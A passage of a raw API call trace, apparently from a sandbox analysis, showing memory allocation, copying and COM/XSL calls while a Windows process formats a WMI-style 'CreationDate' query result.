[0566.325] memcpy (in: _Dst=0x18fdd0, _Src=0x7fef591f2c8, _Size=0x6 | out: _Dst=0x18fdd0) returned 0x18fdd0
[0566.325] memcpy (in: _Dst=0x18fdd6, _Src=0x7fef591f2d0, _Size=0x18 | out: _Dst=0x18fdd6) returned 0x18fdd6
[0566.325] ??2@YAPEAX_K@Z () returned 0x1887c0
[0566.325] malloc (_Size=0x1008) returned 0x390440
[0566.325] ??2@YAPEAX_K@Z () returned 0x391450
[0566.325] malloc (_Size=0x2008) returned 0x3915e0
[0566.325] memcpy (in: _Dst=0x391614, _Src=0x25b1cd0, _Size=0x12 | out: _Dst=0x391614) returned 0x391614
[0566.325] malloc (_Size=0x108) returned 0x18ac30
[0566.326] memcpy (in: _Dst=0x39165c, _Src=0x25b1ce4, _Size=0x8 | out: _Dst=0x39165c) returned 0x39165c
[0566.326] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.326] malloc (_Size=0x208) returned 0x3935f0
[0566.326] malloc (_Size=0x40) returned 0x18fe90
[0566.326] malloc (_Size=0x128) returned 0x391450
[0566.326] memcpy (in: _Dst=0x391450, _Src=0xae7c0, _Size=0x30 | out: _Dst=0x391450) returned 0x391450
[0566.326] memcpy (in: _Dst=0x391488, _Src=0x39165c, _Size=0xa | out: _Dst=0x391488) returned 0x391488
[0566.326] memcpy (in: _Dst=0x39149c, _Src=0x391614, _Size=0x14 | out: _Dst=0x39149c) returned 0x39149c
[0566.326] memcpy (in: _Dst=0x3914b0, _Src=0x0, _Size=0x0 | out: _Dst=0x3914b0) returned 0x3914b0
[0566.326] memcpy (in: _Dst=0x3914b0, _Src=0x18fe90, _Size=0x8 | out: _Dst=0x3914b0) returned 0x3914b0
[0566.326] memcpy (in: _Dst=0x3914c0, _Src=0xaed80, _Size=0x20 | out: _Dst=0x3914c0) returned 0x3914c0
[0566.326] memcpy (in: _Dst=0x3914e0, _Src=0x18fdc0, _Size=0x30 | out: _Dst=0x3914e0) returned 0x3914e0
[0566.326] memcpy (in: _Dst=0x391510, _Src=0x25b1cd0, _Size=0x1e | out: _Dst=0x391510) returned 0x391510
[0566.326] memcpy (in: _Dst=0x391530, _Src=0x393610, _Size=0x30 | out: _Dst=0x391530) returned 0x391530
[0566.326] memcpy (in: _Dst=0x391560, _Src=0x39364c, _Size=0x13 | out: _Dst=0x391560) returned 0x391560
[0566.326] ??2@YAPEAX_K@Z () returned 0x1895a0
[0566.327] free (_Block=0x3915e0)
[0566.327] free (_Block=0x390440)
[0566.327] ??3@YAXPEAX@Z () returned 0x74007800820001
[0566.327] free (_Block=0x18fe90)
[0566.328] free (_Block=0x3935f0)
[0566.328] free (_Block=0x18ac30)
[0566.328] ??2@YAPEAX_K@Z () returned 0x18fe90
[0566.328] memcpy (in: _Dst=0x18d9b0, _Src=0xaec60, _Size=0x10 | out: _Dst=0x18d9b0) returned 0x18d9b0
[0566.329] ??2@YAPEAX_K@Z () returned 0x18fef0
[0566.329] ISystemDebugEventFire:IsActive (This=0x30b4e0) returned 0x1
[0566.329] GetCurrentThreadId () returned 0x440
[0566.329] DllRegisterServer () returned 0x0
[0566.331] IUnknown:QueryInterface (in: This=0x1fd57c0, riid=0x7fef591d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xadb60 | out: ppvObject=0xadb60*=0x1fd57f0) returned 0x0
[0566.331] IUnknown:Release (This=0x1fd57c0) returned 0x1
[0566.331] IUnknown:QueryInterface (in: This=0x1fd57f0, riid=0x7fef591d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xade60 | out: ppvObject=0xade60*=0x1fd57f0) returned 0x0
[0566.332] IDispatchEx:GetDispId (in: This=0x1fd57f0, bstrName="GetNamedItem", grfdex=0x8, pid=0xaddc8 | out: pid=0xaddc8*=83) returned 0x0
[0566.332] IUnknown:Release (This=0x1fd57f0) returned 0x1
[0566.332] IUnknown:AddRef (This=0x1fd57f0) returned 0x2
[0566.332] IUnknown:QueryInterface (in: This=0x1fd57f0, riid=0x7fef591d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xadb50 | out: ppvObject=0xadb50*=0x1fd57f0) returned 0x0
[0566.332] ??2@YAPEAX_K@Z () returned 0x18ff40
[0566.332] IDispatchEx:InvokeEx (in: This=0x1fd57f0, id=83, lcid=0x409, wFlags=0x3, pdp=0xadb28*(rgvarg=([0]=0x18ecd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NAME", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarRes=0xadd68, pei=0xadb70, pspCaller=0x18ff40 | out: pdp=0xadb28*(rgvarg=([0]=0x18ecd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NAME", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarRes=0xadd68*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1fda280, varVal2=0x0), pei=0xadb70*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0)) returned 0x0
[0566.332] IUnknown:Release (This=0x1fd57f0) returned 0x2
[0566.332] IUnknown:Release (This=0x1fd57f0) returned 0x1
[0566.332] IUnknown:QueryInterface (in: This=0x1fda280, riid=0x7fef591d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xadb60 | out: ppvObject=0xadb60*=0x1fda2b0) returned 0x0
[0566.333] IUnknown:Release (This=0x1fda280) returned 0x1
[0566.333] IUnknown:QueryInterface (in: This=0x1fda2b0, riid=0x7fef591d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xade78 | out: ppvObject=0xade78*=0x1fda2b0) returned 0x0
[0566.333] IDispatchEx:GetDispId (in: This=0x1fda2b0, bstrName="Value", grfdex=0x8, pid=0xaddcc | out: pid=0xaddcc*=120) returned 0x0
[0566.333] IUnknown:Release (This=0x1fda2b0) returned 0x1
[0566.333] IUnknown:AddRef (This=0x1fda2b0) returned 0x2
[0566.333] IUnknown:QueryInterface (in: This=0x1fda2b0, riid=0x7fef591d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xadb50 | out: ppvObject=0xadb50*=0x1fda2b0) returned 0x0
[0566.333] IDispatchEx:InvokeEx (in: This=0x1fda2b0, id=120, lcid=0x409, wFlags=0x3, pdp=0xadb28*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarRes=0x18ece8, pei=0xadb70, pspCaller=0x18ff40 | out: pdp=0xadb28*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarRes=0x18ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CreationDate", varVal2=0x0), pei=0xadb70*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0)) returned 0x0
[0566.334] IUnknown:Release (This=0x1fda2b0) returned 0x2
[0566.334] IUnknown:Release (This=0x1fda2b0) returned 0x1
[0566.334] memcpy (in: _Dst=0x18f828, _Src=0x7fef5931978, _Size=0x10 | out: _Dst=0x18f828) returned 0x18f828
[0566.335] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="PROPERTY", cchCount1=8, lpString2="Property.Array", cchCount2=14) returned 1
[0566.335] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="PROPERTY", cchCount1=8, lpString2="Property.Reference", cchCount2=18) returned 1
[0566.336] memcpy (in: _Dst=0x18f878, _Src=0x7fef5933a60, _Size=0xa | out: _Dst=0x18f878) returned 0x18f878
[0566.336] memcpy (in: _Dst=0x18f8c8, _Src=0x7fef5932208, _Size=0x10 | out: _Dst=0x18f8c8) returned 0x18f8c8
[0566.338] memcpy (in: _Dst=0x2f9f98, _Src=0x2fa6c8, _Size=0x32 | out: _Dst=0x2f9f98) returned 0x2f9f98
[0566.339] malloc (_Size=0x808) returned 0x390440
[0566.339] memcpy (in: _Dst=0x390488, _Src=0x7fef5933b10, _Size=0xa | out: _Dst=0x390488) returned 0x390488
[0566.339] memcpy (in: _Dst=0x35bac8, _Src=0x2fa6c8, _Size=0x32 | out: _Dst=0x35bac8) returned 0x35bac8
[0566.339] GetCurrentThreadId () returned 0x440
[0566.339] DllRegisterServer () returned 0x0
[0566.340] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.340] ISystemDebugEventFire:IsActive (This=0x30b4e0) returned 0x1
[0566.340] free (_Block=0x391450)
[0566.340] ??3@YAXPEAX@Z () returned 0x20016900580001
[0566.340] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.341] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.341] free (_Block=0x18fdc0)
[0566.341] GetCurrentThreadId () returned 0x440
[0566.341] realloc (_Block=0x0, _Size=0xc8) returned 0x18fdc0
[0566.341] memcpy (in: _Dst=0x18fdc0, _Src=0x7fef5930800, _Size=0x10 | out: _Dst=0x18fdc0) returned 0x18fdc0
[0566.341] memcpy (in: _Dst=0x18fdd0, _Src=0x7fef591f2c8, _Size=0x6 | out: _Dst=0x18fdd0) returned 0x18fdd0
[0566.341] memcpy (in: _Dst=0x18fdd6, _Src=0x7fef591f2d0, _Size=0x18 | out: _Dst=0x18fdd6) returned 0x18fdd6
[0566.341] ??2@YAPEAX_K@Z () returned 0x1887c0
[0566.341] malloc (_Size=0x1008) returned 0x390c50
[0566.341] ??2@YAPEAX_K@Z () returned 0x391c60
[0566.341] malloc (_Size=0x2008) returned 0x391df0
[0566.341] memcpy (in: _Dst=0x391e24, _Src=0x25b1960, _Size=0x1a | out: _Dst=0x391e24) returned 0x391e24
[0566.341] malloc (_Size=0x108) returned 0x18ac30
[0566.342] memcpy (in: _Dst=0x391e74, _Src=0x25b197c, _Size=0x8 | out: _Dst=0x391e74) returned 0x391e74
[0566.342] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.342] malloc (_Size=0x208) returned 0x393e00
[0566.342] malloc (_Size=0x40) returned 0x18fe90
[0566.342] malloc (_Size=0x138) returned 0x391c60
[0566.342] memcpy (in: _Dst=0x391c60, _Src=0xae7c0, _Size=0x30 | out: _Dst=0x391c60) returned 0x391c60
[0566.342] memcpy (in: _Dst=0x391c98, _Src=0x391e74, _Size=0xa | out: _Dst=0x391c98) returned 0x391c98
[0566.342] memcpy (in: _Dst=0x391cac, _Src=0x391e24, _Size=0x1c | out: _Dst=0x391cac) returned 0x391cac
[0566.342] memcpy (in: _Dst=0x391cc8, _Src=0x0, _Size=0x0 | out: _Dst=0x391cc8) returned 0x391cc8
[0566.342] memcpy (in: _Dst=0x391cc8, _Src=0x18fe90, _Size=0x8 | out: _Dst=0x391cc8) returned 0x391cc8
[0566.342] memcpy (in: _Dst=0x391cd8, _Src=0xaed80, _Size=0x20 | out: _Dst=0x391cd8) returned 0x391cd8
[0566.342] memcpy (in: _Dst=0x391cf8, _Src=0x18fdc0, _Size=0x30 | out: _Dst=0x391cf8) returned 0x391cf8
[0566.342] memcpy (in: _Dst=0x391d28, _Src=0x25b1960, _Size=0x26 | out: _Dst=0x391d28) returned 0x391d28
[0566.342] memcpy (in: _Dst=0x391d50, _Src=0x393e20, _Size=0x30 | out: _Dst=0x391d50) returned 0x391d50
[0566.342] memcpy (in: _Dst=0x391d80, _Src=0x393e5c, _Size=0x13 | out: _Dst=0x391d80) returned 0x391d80
[0566.342] ??2@YAPEAX_K@Z () returned 0x1895a0
[0566.343] free (_Block=0x391df0)
[0566.343] free (_Block=0x390c50)
[0566.343] ??3@YAXPEAX@Z () returned 0x74007900820001
[0566.344] free (_Block=0x18fe90)
[0566.344] free (_Block=0x393e00)
[0566.345] free (_Block=0x18ac30)
[0566.345] ??2@YAPEAX_K@Z () returned 0x18fe90
[0566.345] memcpy (in: _Dst=0x18d9b0, _Src=0xaec60, _Size=0x10 | out: _Dst=0x18d9b0) returned 0x18d9b0
[0566.345] ??2@YAPEAX_K@Z () returned 0x18fef0
[0566.345] ISystemDebugEventFire:IsActive (This=0x30b4e0) returned 0x1
[0566.345] GetCurrentThreadId () returned 0x440
[0566.346] DllRegisterServer () returned 0x0
[0566.346] realloc (_Block=0x0, _Size=0x140) returned 0x390c50
[0566.346] memcpy (in: _Dst=0x390c50, _Src=0x18f010, _Size=0xa0 | out: _Dst=0x390c50) returned 0x390c50
[0566.346] memcpy (in: _Dst=0x3904d8, _Src=0x7fef5930398, _Size=0x8 | out: _Dst=0x3904d8) returned 0x3904d8
[0566.347] memcpy (in: _Dst=0x390520, _Src=0x7fef59303f0, _Size=0x8 | out: _Dst=0x390520) returned 0x390520
[0566.347] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa628, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.347] memcpy (in: _Dst=0x390568, _Src=0x7fef5931c40, _Size=0xa | out: _Dst=0x390568) returned 0x390568
[0566.347] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa62a, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.347] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa62c, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.347] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa62e, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.348] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa630, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.348] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa632, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.348] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa634, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.348] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa636, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.348] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa638, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.349] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa63a, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.349] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa63c, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.349] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa63e, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.350] memcpy (in: _Dst=0x36c1d8, _Src=0x35bac8, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.350] memcpy (in: _Dst=0x36c1d8, _Src=0x35baca, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.351] memcpy (in: _Dst=0x36c1d8, _Src=0x35bacc, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.351] memcpy (in: _Dst=0x36c1d8, _Src=0x35bace, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.351] memcpy (in: _Dst=0x36c1d8, _Src=0x35bad0, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.351] memcpy (in: _Dst=0x36c1d8, _Src=0x35bad2, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.351] memcpy (in: _Dst=0x36c1d8, _Src=0x35bad4, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.352] memcpy (in: _Dst=0x36c1d8, _Src=0x35bad6, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.352] memcpy (in: _Dst=0x36c1d8, _Src=0x35bad8, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.352] memcpy (in: _Dst=0x36c1d8, _Src=0x35bada, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.352] memcpy (in: _Dst=0x36c1d8, _Src=0x35badc, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.352] memcpy (in: _Dst=0x36c1d8, _Src=0x35bade, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.353] memcpy (in: _Dst=0x36c1d8, _Src=0x35bae0, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.353] memcpy (in: _Dst=0x36c1d8, _Src=0x35bae2, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.353] memcpy (in: _Dst=0x36c1d8, _Src=0x35bae4, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.353] memcpy (in: _Dst=0x36c1d8, _Src=0x35bae6, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.354] memcpy (in: _Dst=0x36c1d8, _Src=0x35bae8, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.354] memcpy (in: _Dst=0x36c1d8, _Src=0x35baea, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.354] memcpy (in: _Dst=0x36c1d8, _Src=0x35baec, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.354] memcpy (in: _Dst=0x36c1d8, _Src=0x35baee, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.354] memcpy (in: _Dst=0x36c1d8, _Src=0x35baf0, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.355] memcpy (in: _Dst=0x36c1d8, _Src=0x35baf2, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.355] memcpy (in: _Dst=0x36c1d8, _Src=0x35baf4, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.355] memcpy (in: _Dst=0x36c1d8, _Src=0x35baf6, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.355] memcpy (in: _Dst=0x36c1d8, _Src=0x35baf8, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.356] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa628, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.357] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa62a, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.357] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa62c, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.357] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa62e, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.357] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa630, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.357] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa632, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.358] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa634, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.358] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa636, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.358] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa638, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.358] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa63a, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.358] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa63c, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.359] memcpy (in: _Dst=0x36c1d8, _Src=0x2fa63e, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.359] memcpy (in: _Dst=0x2fa3f8, _Src=0x36c1d8, _Size=0x0 | out: _Dst=0x2fa3f8) returned 0x2fa3f8
[0566.359] memcpy (in: _Dst=0x2fa3f8, _Src=0x2fa628, _Size=0x18 | out: _Dst=0x2fa3f8) returned 0x2fa3f8
[0566.360] memcpy (in: _Dst=0x3905b8, _Src=0x7fef59303c0, _Size=0xa | out: _Dst=0x3905b8) returned 0x3905b8
[0566.360] memcpy (in: _Dst=0x2f9f98, _Src=0x2fa6c8, _Size=0x1e | out: _Dst=0x2f9f98) returned 0x2f9f98
[0566.360] memcpy (in: _Dst=0x2fa6c8, _Src=0x2fa3f8, _Size=0x18 | out: _Dst=0x2fa6c8) returned 0x2fa6c8
[0566.360] memcpy (in: _Dst=0x2fa6e0, _Src=0x2f9f98, _Size=0x1e | out: _Dst=0x2fa6e0) returned 0x2fa6e0
[0566.361] memcpy (in: _Dst=0x36c1d8, _Src=0x35bac8, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.361] memcpy (in: _Dst=0x36c1d8, _Src=0x35baca, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.361] memcpy (in: _Dst=0x36c1d8, _Src=0x35bacc, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.362] memcpy (in: _Dst=0x36c1d8, _Src=0x35bace, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.362] memcpy (in: _Dst=0x36c1d8, _Src=0x35bad0, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.362] memcpy (in: _Dst=0x36c1d8, _Src=0x35bad2, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.362] memcpy (in: _Dst=0x36c1d8, _Src=0x35bad4, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.362] memcpy (in: _Dst=0x36c1d8, _Src=0x35bad6, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.363] memcpy (in: _Dst=0x36c1d8, _Src=0x35bad8, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.363] memcpy (in: _Dst=0x36c1d8, _Src=0x35bada, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.363] memcpy (in: _Dst=0x36c1d8, _Src=0x35badc, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.363] memcpy (in: _Dst=0x36c1d8, _Src=0x35bade, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.364] memcpy (in: _Dst=0x36c1d8, _Src=0x35bae0, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.364] memcpy (in: _Dst=0x36c1d8, _Src=0x35bae2, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.364] memcpy (in: _Dst=0x36c1d8, _Src=0x35bae4, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.364] memcpy (in: _Dst=0x36c1d8, _Src=0x35bae6, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.364] memcpy (in: _Dst=0x36c1d8, _Src=0x35bae8, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.365] memcpy (in: _Dst=0x36c1d8, _Src=0x35baea, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.365] memcpy (in: _Dst=0x36c1d8, _Src=0x35baec, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.365] memcpy (in: _Dst=0x36c1d8, _Src=0x35baee, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.365] memcpy (in: _Dst=0x36c1d8, _Src=0x35baf0, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.366] memcpy (in: _Dst=0x36c1d8, _Src=0x35baf2, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.366] memcpy (in: _Dst=0x36c1d8, _Src=0x35baf4, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.366] memcpy (in: _Dst=0x36c1d8, _Src=0x35baf6, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.366] memcpy (in: _Dst=0x36c1d8, _Src=0x35baf8, _Size=0x2 | out: _Dst=0x36c1d8) returned 0x36c1d8
[0566.367] memcpy (in: _Dst=0x2f9f98, _Src=0x36c1d8, _Size=0x0 | out: _Dst=0x2f9f98) returned 0x2f9f98
[0566.367] memcpy (in: _Dst=0x2f9f98, _Src=0x35bac8, _Size=0x32 | out: _Dst=0x2f9f98) returned 0x2f9f98
[0566.368] memcpy (in: _Dst=0x36c208, _Src=0x2fa3f8, _Size=0x4 | out: _Dst=0x36c208) returned 0x36c208
[0566.368] memcpy (in: _Dst=0x2fa3f8, _Src=0x2f9f98, _Size=0x32 | out: _Dst=0x2fa3f8) returned 0x2fa3f8
[0566.368] memcpy (in: _Dst=0x2fa42a, _Src=0x36c208, _Size=0x4 | out: _Dst=0x2fa42a) returned 0x2fa42a
[0566.368] memcpy (in: _Dst=0x390608, _Src=0x7fef5930620, _Size=0xe | out: _Dst=0x390608) returned 0x390608
[0566.368] memcpy (in: _Dst=0x348828, _Src=0x2fa3f8, _Size=0x36 | out: _Dst=0x348828) returned 0x348828
[0566.368] memcpy (in: _Dst=0x34885e, _Src=0x36c208, _Size=0x4 | out: _Dst=0x34885e) returned 0x34885e
[0566.369] memcpy (in: _Dst=0x2fb808, _Src=0x2fa6c8, _Size=0x36 | out: _Dst=0x2fb808) returned 0x2fb808
[0566.369] memcpy (in: _Dst=0x2fb83e, _Src=0x36c208, _Size=0x4 | out: _Dst=0x2fb83e) returned 0x2fb83e
[0566.369] memcpy (in: _Dst=0x308ff8, _Src=0x2fb808, _Size=0x3a | out: _Dst=0x308ff8) returned 0x308ff8
[0566.369] memcpy (in: _Dst=0x309032, _Src=0x348828, _Size=0x3a | out: _Dst=0x309032) returned 0x309032
[0566.369] GetCurrentThreadId () returned 0x440
[0566.369] DllRegisterServer () returned 0x0
[0566.370] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.370] ISystemDebugEventFire:IsActive (This=0x30b4e0) returned 0x1
[0566.370] free (_Block=0x391c60)
[0566.370] ??3@YAXPEAX@Z () returned 0x20016a00580001
[0566.370] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.371] free (_Block=0x18fdc0)
[0566.371] GetCurrentThreadId () returned 0x440
[0566.371] GetCurrentThreadId () returned 0x440
[0566.371] IUnknown:Release (This=0x30b4e0) returned 0x1
[0566.371] DllRegisterServer () returned 0x0
[0566.371] DllRegisterServer () returned 0x0
[0566.371] GetUserDefaultLCID () returned 0x409
[0566.371] GetACP () returned 0x4e4
[0566.371] ??3@YAXPEAX@Z () returned 0x20016b005c0001
[0566.371] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.371] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.371] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.372] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.372] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.372] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.415] free (_Block=0x18f0c0)
[0566.415] free (_Block=0x390c50)
[0566.416] free (_Block=0x390440)
[0566.416] free (_Block=0x18f4f0)
[0566.416] free (_Block=0x18f1f0)
[0566.417] free (_Block=0x18ab20)
[0566.417] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.417] ??3@YAXPEAX@Z () returned 0x74007a007e0001
[0566.417] ISystemDebugEventFire:EndSession (This=0x30b4e0) returned 0x0
[0566.417] IUnknown:Release (This=0x30b4e0) returned 0x0
[0566.417] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.417] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.417] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.417] DllRegisterServer () returned 0x0
[0566.418] IXSLProcessor:get_output (in: This=0x1fd9640, pOutput=0xaf260 | out: pOutput=0xaf260*(varType=0x8, wReserved1=0x1fd, wReserved2=0x0, wReserved3=0x0, varVal1="CreationDate \r\n20240603113412.436800+120 \r\n", varVal2=0x1)) returned 0x0
[0566.418] malloc (_Size=0x18) returned 0x189040
[0566.418] XSLTemplate:IUnknown:Release (This=0x1fd9640) returned 0x0
[0566.418] FreeThreadedDOMDocument:IUnknown:Release (This=0x1fdb330) returned 0x2
[0566.418] XSLTemplate:IUnknown:Release (This=0x1fd7620) returned 0x0
